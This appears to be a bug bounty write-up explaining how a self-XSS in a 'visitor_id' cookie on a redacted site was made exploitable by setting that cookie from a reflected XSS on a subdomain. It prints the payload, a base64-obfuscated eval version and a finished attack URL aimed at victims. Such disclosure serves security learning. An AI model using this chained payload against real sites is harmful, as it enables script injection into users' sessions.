From Unexploited XSS To Self Stored XSS on victim Cookies
Hello Friends
2 min readJan 17, 2021
Day#1
This is part 2 of this story , i will talk about a self XSS on Cookies And how i did the exploit through an out of scope subdomain.
So our target is redact.com. firstly how i got the vulnerable attribute on cookies based? After browsing the redact.com i stopped in this path www.redacted.com/redactedfolder/redactedpage/ID and i used param miner {bruteForce] for hidden parameters , i got TWO but Unfortunately all are Filtered, then turned to guess Cookie parameters
finally i got an attribute named visitor_id and was injected on the js source code
Now i have A self XSS and it’s out of scope. but subdomains allows you to set cookie so i will exploit through an out-of scope subdomain.
Day#2
i extracted subdomains, after 1h/2h i got an reflected xss on a sub named http://dev-labs.redact.com/login?username=[Here], So we will set cookie from subdomain to the main domain, [Hope you understand the exploitation if you not , please watch the video]
our exploit:
document.cookie='visitor_id=w0</script><svg/onload=alert(document.domain)>; domain=.redact.com; path=/;' ;document.location="https://www.redact.com/redactfolder/redactpage/1337"
let’s Encode it:
</script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>
So Now we have A valid Poc will all sent the url to victime:
http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('
ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>